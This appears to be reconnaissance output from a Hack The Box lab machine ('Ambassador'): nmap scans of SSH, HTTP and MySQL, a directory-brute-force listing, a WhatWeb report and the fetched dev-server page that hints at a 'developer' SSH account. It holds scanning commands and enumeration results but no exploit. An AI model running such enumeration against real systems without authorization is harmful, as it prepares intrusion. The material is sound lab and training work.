<ports><port protocol="tcp" portid="3306"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="mysql" product="MySQL" version="8.0.30-0ubuntu0.20.04.2" method="probed" conf="10"><cpe>cpe:/a:mysql:mysql:8.0.30-0ubuntu0.20.04.2</cpe></service><script id="mysql-info" output="&#xa; Protocol: 10&#xa; Version: 8.0.30-0ubuntu0.20.04.2&#xa; Thread ID: 61&#xa; Capabilities flags: 65535&#xa; Some Capabilities: Support41Auth, Speaks41ProtocolOld, LongPassword, ConnectWithDatabase, ODBCClient, SupportsTransactions, LongColumnFlag, FoundRows, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSigpipes, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins&#xa; Status: Autocommit&#xa; Salt: ; E\x18{q7/Y&amp;NBxIZ\x132(&amp;Y&#xa; Auth Plugin Name: caching_sha2_password"><elem key="Protocol">10</elem>
<elem key="Version">8.0.30-0ubuntu0.20.04.2</elem>
<elem key="Thread ID">61</elem>
<elem key="Capabilities flags">65535</elem>
<table key="Some Capabilities">
<elem>Support41Auth</elem>
<elem>Speaks41ProtocolOld</elem>
<elem>LongPassword</elem>
<elem>ConnectWithDatabase</elem>
<elem>ODBCClient</elem>
<elem>SupportsTransactions</elem>
<elem>LongColumnFlag</elem>
<elem>FoundRows</elem>
<elem>SwitchToSSLAfterHandshake</elem>
<elem>IgnoreSpaceBeforeParenthesis</elem>
<elem>SupportsLoadDataLocal</elem>
<elem>Speaks41ProtocolNew</elem>
<elem>IgnoreSigpipes</elem>
<elem>DontAllowDatabaseTableColumn</elem>
<elem>InteractiveClient</elem>
<elem>SupportsCompression</elem>
<elem>SupportsMultipleStatments</elem>
<elem>SupportsMultipleResults</elem>
<elem>SupportsAuthPlugins</elem>
</table>
<elem key="Status">Autocommit</elem>
<elem key="Salt">; E\x18{q7/Y&amp;NBxIZ\x132(&amp;Y</elem>
<elem key="Auth Plugin Name">caching_sha2_password</elem>
</script><script id="banner" output="[\x00\x00\x00\x0A8.0.30-0ubuntu0.20.04.2\x00?\x00\x00\x00&quot;Rcm%P&#xa;\x19Z\x00\xFF\xFF\xFF\x02\x00\xFF\xDF\x15\x00\x00\x00\x00\x00\x00\x00\x&#xa;00\x00\x009i1\,\x1C`P\x02g{+\x00caching_sha2_password\x00"/></port>
</ports>
<times srtt="38384" rttvar="38384" to="191920"/>
</host>
<taskbegin task="NSE" time="1674563372"/>
<taskend task="NSE" time="1674563372"/>
<taskbegin task="NSE" time="1674563372"/>
<taskend task="NSE" time="1674563372"/>
<taskbegin task="NSE" time="1674563372"/>
<taskend task="NSE" time="1674563372"/>
<runstats><finished time="1674563372" timestr="Tue Jan 24 07:29:32 2023" summary="Nmap done at Tue Jan 24 07:29:32 2023; 1 IP address (1 host up) scanned in 108.73 seconds" elapsed="108.73" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,165 @@
HTTP/1.1 200 OK
Date: Tue, 24 Jan 2023 12:27:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
ETag: "e46-5e7a7c4652f79"
Accept-Ranges: bytes
Content-Length: 3654
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Ambassador Development Server</title>
<meta name="viewport" content="width=device-width,minimum-scale=1">
<meta name="description" content="">
<meta name="generator" content="Hugo 0.94.2" />
<meta name="robots" content="noindex, nofollow">
<link rel="stylesheet" href="/ananke/css/main.min.css" >
<link href="/index.xml" rel="alternate" type="application/rss+xml" title="Ambassador Development Server" />
<link href="/index.xml" rel="feed" type="application/rss+xml" title="Ambassador Development Server" />
<meta property="og:title" content="Ambassador Development Server" />
<meta property="og:description" content="" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://example.org/" />
<meta itemprop="name" content="Ambassador Development Server">
<meta itemprop="description" content=""><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Ambassador Development Server"/>
<meta name="twitter:description" content=""/>
</head>
<body class="ma0 avenir bg-near-white">
<header>
<div class="pb3-m pb6-l bg-black">
<nav class="pv3 ph3 ph4-ns" role="navigation">
<div class="flex-l justify-between items-center center">
<a href="/" class="f3 fw2 hover-white no-underline white-90 dib">
Ambassador Development Server
</a>
<div class="flex-l items-center">
<div class="ananke-socials">
</div>
</div>
</div>
</nav>
<div class="tc-l pv3 ph3 ph4-ns">
<h1 class="f2 f-subheadline-l fw2 light-silver mb0 lh-title">
Ambassador Development Server
</h1>
</div>
</div>
</header>
<main class="pb7" role="main">
<article class="cf ph3 ph5-l pv3 pv4-l f4 tc-l center measure-wide lh-copy mid-gray">
</article>
<div class="pa3 pa4-ns w-100 w-70-ns center">
<h1 class="flex-none">
Recent Posts
</h1>
<section class="w-100 mw8">
<div class="relative w-100 mb4">
<article class="bb b--black-10">
<div class="db pv4 ph3 ph0-l no-underline dark-gray">
<div class="flex flex-column flex-row-ns">
<div class="blah w-100">
<h1 class="f3 fw1 athelas mt0 lh-title">
<a href="/posts/welcome-to-the-ambassador-development-server/" class="color-inherit dim link">
Welcome to the Ambassador Development Server
</a>
</h1>
<div class="f6 f5-l lh-copy nested-copy-line-height nested-links">
Hi there! This server exists to provide developers at Ambassador with a standalone development environment. When you start as a developer at Ambassador, you will be assigned a development server of your own to use.
Connecting to this machine Use the developer account to SSH, DevOps will give you the password.
</div>
<a href="/posts/welcome-to-the-ambassador-development-server/" class="ba b--moon-gray bg-light-gray br2 color-inherit dib f7 hover-bg-moon-gray link mt2 ph2 pv1">read more</a>
</div>
</div>
</div>
</article>
</div>
</section>
</div>
</main>
<footer>
<div>
<p>
Ambassador Inc.
</p>
</div>
</footer>
</body>
</html>


@@ -0,0 +1,33 @@
200 GET 1l 242w 75263c http://10.10.11.183/ananke/css/main.min.css
200 GET 21l 101w 1230c http://10.10.11.183/index.xml
200 GET 155l 305w 3654c http://10.10.11.183/
403 GET 9l 28w 277c http://10.10.11.183/.html
403 GET 9l 28w 277c http://10.10.11.183/.hta
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd
403 GET 9l 28w 277c http://10.10.11.183/.htaccess
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.txt
403 GET 9l 28w 277c http://10.10.11.183/.hta.txt
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.txt
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.html
403 GET 9l 28w 277c http://10.10.11.183/.hta.html
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.html
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.php
403 GET 9l 28w 277c http://10.10.11.183/.hta.php
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.php
403 GET 9l 28w 277c http://10.10.11.183/.hta.asp
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.asp
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.asp
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.aspx
403 GET 9l 28w 277c http://10.10.11.183/.hta.aspx
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.aspx
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.jsp
403 GET 9l 28w 277c http://10.10.11.183/.hta.jsp
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.jsp
200 GET 92l 143w 1793c http://10.10.11.183/404.html
301 GET 9l 28w 317c http://10.10.11.183/categories => http://10.10.11.183/categories/
301 GET 9l 28w 313c http://10.10.11.183/images => http://10.10.11.183/images/
200 GET 155l 305w 3654c http://10.10.11.183/index.html
301 GET 9l 28w 312c http://10.10.11.183/posts => http://10.10.11.183/posts/
403 GET 9l 28w 277c http://10.10.11.183/server-status
200 GET 18l 22w 645c http://10.10.11.183/sitemap.xml
301 GET 9l 28w 311c http://10.10.11.183/tags => http://10.10.11.183/tags/


@@ -0,0 +1,108 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.036s latency).
Scanned at 2023-01-24 07:27:44 EST for 18s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-mobileversion-checker: No mobile version detected.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-errors: Couldn't find any error pages.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-malware-host: Host appears to be clean
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-generator: Hugo 0.94.2
|_http-chrono: Request times for /; avg: 196.43ms; min: 171.38ms; max: 209.87ms
|_http-date: Tue, 24 Jan 2023 12:27:51 GMT; 0s from local time.
| http-feed:
| Spidering limited to: maxpagecount=40; withinhost=ambassador.htb
| Found the following feeds:
|_ RSS (version 2.0): http://ambassador.htb:80/index.xml
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-vhosts:
|_128 names had status 200
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; xml: 1
| /ananke/css/
| css: 1
| /posts/welcome-to-the-ambassador-development-server/
| Other: 1
| Longest directory structure:
| Depth: 2
| Dir: /posts/welcome-to-the-ambassador-development-server/
| Total files found (by extension):
|_ Other: 2; css: 1; xml: 1
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-title: Ambassador Development Server
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ambassador.htb
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
| /*!normalize.css v8.0.0 | MIT License | github.com/necolas/normalize.css*/
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
| /*!TACHYONS v4.12.0 | http://tachyons.io*/
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
|_ /*!TACHYONS v4.9.1 | http://tachyons.io*/
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-headers:
| Date: Tue, 24 Jan 2023 12:27:52 GMT
| Server: Apache/2.4.41 (Ubuntu)
| Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
| ETag: "e46-5e7a7c4652f79"
| Accept-Ranges: bytes
| Content-Length: 3654
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
| http-php-version: Logo query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327
|_Credits query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:28:02 2023 -- 1 IP address (1 host up) scanned in 18.76 seconds

Binary file not shown.



@@ -0,0 +1,69 @@
WhatWeb report for http://10.10.11.183:80
Status : 200 OK
Title : Ambassador Development Server
IP : 10.10.11.183
Country : RESERVED, ZZ
Summary : Apache[2.4.41], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], MetaGenerator[Hugo 0.94.2], Open-Graph-Protocol[website], X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.41 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.41 (Ubuntu) (from server string)
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Hugo 0.94.2
[ Open-Graph-Protocol ]
The Open Graph protocol enables you to integrate your Web
pages into the social graph. It is currently designed for
Web pages representing profiles of real-world things .
things like movies, sports teams, celebrities, and
restaurants. Including Open Graph tags on your Web page,
makes your page equivalent to a Facebook Page.
Version : website
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 24 Jan 2023 12:27:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
ETag: "e46-5e7a7c4652f79-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1310
Connection: close
Content-Type: text/html


@@ -0,0 +1,74 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.183" start="1674563263" startstr="Tue Jan 24 07:27:43 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="1" services="80"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563264"/>
<taskbegin task="Connect Scan" time="1674563264"/>
<taskend task="Connect Scan" time="1674563264" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674563264"/>
<taskend task="Service scan" time="1674563270" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674563270"/>
<taskend task="NSE" time="1674563282"/>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
<host starttime="1674563264" endtime="1674563282"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.41" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.41</cpe></service><script id="http-mobileversion-checker" output="No mobile version detected."/><script id="http-devframework" output="Couldn&apos;t determine the underlying framework or CMS. Try increasing &apos;httpspider.maxpagecount&apos; value to spider more pages."/><script id="http-errors" output="Couldn&apos;t find any error pages."/><script id="http-litespeed-sourcecode-download" output="Request with null byte did not work. This web server might not be vulnerable"/><script id="http-referer-checker" output="Couldn&apos;t find any cross-domain scripts."/><script id="http-malware-host" output="Host appears to be clean"/><script id="http-csrf" output="Couldn&apos;t find any CSRF vulnerabilities."/><script id="http-generator" output="Hugo 0.94.2"/><script id="http-chrono" output="Request times for /; avg: 196.43ms; min: 171.38ms; max: 209.87ms"/><script id="http-date" output="Tue, 24 Jan 2023 12:27:51 GMT; 0s from local time."><elem key="date">2023-01-24T12:27:51+00:00</elem>
<elem key="delta">0.0</elem>
</script><script id="http-feed" output="&#xa;Spidering limited to: maxpagecount=40; withinhost=ambassador.htb&#xa; Found the following feeds: &#xa; RSS (version 2.0): http://ambassador.htb:80/index.xml&#xa;"/><script id="http-jsonp-detection" output="Couldn&apos;t find any JSONP endpoints."/><script id="http-dombased-xss" output="Couldn&apos;t find any DOM based XSS."/><script id="http-useragent-tester" output="&#xa; Status for browser useragent: 200&#xa; Allowed User Agents: &#xa; Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&#xa; libwww&#xa; lwp-trivial&#xa; libcurl-agent/1.0&#xa; PHP/&#xa; Python-urllib/2.5&#xa; GT::WWW&#xa; Snoopy&#xa; MFC_Tear_Sample&#xa; HTTP::Lite&#xa; PHPCrawl&#xa; URI::Fetch&#xa; Zend_Http_Client&#xa; http client&#xa; PECL::HTTP&#xa; Wget/1.13.4 (linux-gnu)&#xa; WWW-Mechanize/1.34"><elem key="Status for browser useragent">200</elem>
<table key="Allowed User Agents">
<elem>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</elem>
<elem>libwww</elem>
<elem>lwp-trivial</elem>
<elem>libcurl-agent/1.0</elem>
<elem>PHP/</elem>
<elem>Python-urllib/2.5</elem>
<elem>GT::WWW</elem>
<elem>Snoopy</elem>
<elem>MFC_Tear_Sample</elem>
<elem>HTTP::Lite</elem>
<elem>PHPCrawl</elem>
<elem>URI::Fetch</elem>
<elem>Zend_Http_Client</elem>
<elem>http client</elem>
<elem>PECL::HTTP</elem>
<elem>Wget/1.13.4 (linux-gnu)</elem>
<elem>WWW-Mechanize/1.34</elem>
</table>
</script><script id="http-fetch" output="Please enter the complete path of the directory to save data in."><elem key="ERROR">Please enter the complete path of the directory to save data in.</elem>
</script><script id="http-vhosts" output="&#xa;128 names had status 200"/><script id="http-methods" output="&#xa; Supported Methods: GET POST OPTIONS HEAD"><table key="Supported Methods">
<elem>GET</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
<elem>HEAD</elem>
</table>
</script><script id="http-sitemap-generator" output="&#xa; Directory structure:&#xa; /&#xa; Other: 1; xml: 1&#xa; /ananke/css/&#xa; css: 1&#xa; /posts/welcome-to-the-ambassador-development-server/&#xa; Other: 1&#xa; Longest directory structure:&#xa; Depth: 2&#xa; Dir: /posts/welcome-to-the-ambassador-development-server/&#xa; Total files found (by extension):&#xa; Other: 2; css: 1; xml: 1&#xa;"/><script id="http-wordpress-users" output="[Error] Wordpress installation was not found. We couldn&apos;t find wp-login.php"/><script id="http-title" output="Ambassador Development Server"><elem key="title">Ambassador Development Server</elem>
</script><script id="http-stored-xss" output="Couldn&apos;t find any stored XSS vulnerabilities."/><script id="http-comments-displayer" output="&#xa;Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ambassador.htb&#xa; &#xa; Path: http://ambassador.htb:80/ananke/css/main.min.css&#xa; Line number: 1&#xa; Comment: &#xa; /*!normalize.css v8.0.0 | MIT License | github.com/necolas/normalize.css*/&#xa; &#xa; Path: http://ambassador.htb:80/ananke/css/main.min.css&#xa; Line number: 1&#xa; Comment: &#xa; /*!TACHYONS v4.12.0 | http://tachyons.io*/&#xa; &#xa; Path: http://ambassador.htb:80/ananke/css/main.min.css&#xa; Line number: 1&#xa; Comment: &#xa; /*!TACHYONS v4.9.1 | http://tachyons.io*/&#xa;"/><script id="http-wordpress-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args search-limit=&lt;number|all&gt; for deeper analysis)"/><script id="http-internal-ip-disclosure" output="&#xa; Internal IP Leaked: 127.0.1.1"><elem key="Internal IP Leaked">127.0.1.1</elem>
</script><script id="http-headers" output="&#xa; Date: Tue, 24 Jan 2023 12:27:52 GMT&#xa; Server: Apache/2.4.41 (Ubuntu)&#xa; Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT&#xa; ETag: &quot;e46-5e7a7c4652f79&quot;&#xa; Accept-Ranges: bytes&#xa; Content-Length: 3654&#xa; Vary: Accept-Encoding&#xa; Connection: close&#xa; Content-Type: text/html&#xa; &#xa; (Request type: HEAD)&#xa;"/><script id="http-php-version" output="Logo query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327&#xa;Credits query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327"/><script id="http-security-headers" output=""></script><script id="http-config-backup" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-drupal-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args number=&lt;number|all&gt; for deeper analysis)"/><script id="http-server-header" output="Apache/2.4.41 (Ubuntu)"><elem>Apache/2.4.41 (Ubuntu)</elem>
</script><script id="http-enum" output="&#xa; /images/: Potentially interesting directory w/ listing on &apos;apache/2.4.41 (ubuntu)&apos;&#xa;"/></port>
</ports>
<times srtt="35950" rttvar="35950" to="179750"/>
</host>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
<taskbegin task="NSE" time="1674563282"/>
<taskend task="NSE" time="1674563282"/>
<runstats><finished time="1674563282" timestr="Tue Jan 24 07:28:02 2023" summary="Nmap done at Tue Jan 24 07:28:02 2023; 1 IP address (1 host up) scanned in 18.76 seconds" elapsed="18.76" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,105 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml 10.10.11.183" start="1674562969" startstr="Tue Jan 24 07:22:49 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="NSE" time="1674562969"/>
<taskend task="NSE" time="1674562969"/>
<taskbegin task="Connect Scan" time="1674562969"/>
<taskend task="Connect Scan" time="1674563007" extrainfo="65535 total ports"/>
<taskbegin task="Service scan" time="1674563007"/>
<taskend task="Service scan" time="1674563275" extrainfo="4 services on 1 host"/>
<taskbegin task="NSE" time="1674563275"/>
<taskend task="NSE" time="1674563283"/>
<taskbegin task="NSE" time="1674563283"/>
<taskend task="NSE" time="1674563304"/>
<taskbegin task="NSE" time="1674563304"/>
<taskend task="NSE" time="1674563304"/>
<host starttime="1674562969" endtime="1674563304"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="65531">
<extrareasons reason="conn-refused" count="65531" proto="tcp" ports="1-21,23-79,81-2999,3001-3305,3307-65535"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.2p1 Ubuntu 4ubuntu0.5" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.2p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=&#xa; 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=&#xa; 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W"><table>
<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=</elem>
<elem key="fingerprint">29dd8ed7171e8e3090873cc651007c75</elem>
<elem key="bits">3072</elem>
<elem key="type">ssh-rsa</elem>
</table>
<table>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=</elem>
<elem key="fingerprint">80a4c52e9ab1ecda276439a408973bef</elem>
<elem key="bits">256</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
</table>
<table>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W</elem>
<elem key="fingerprint">f590ba7ded55cb7007f2bbc891931bf6</elem>
<elem key="bits">256</elem>
<elem key="type">ssh-ed25519</elem>
</table>
</script></port>
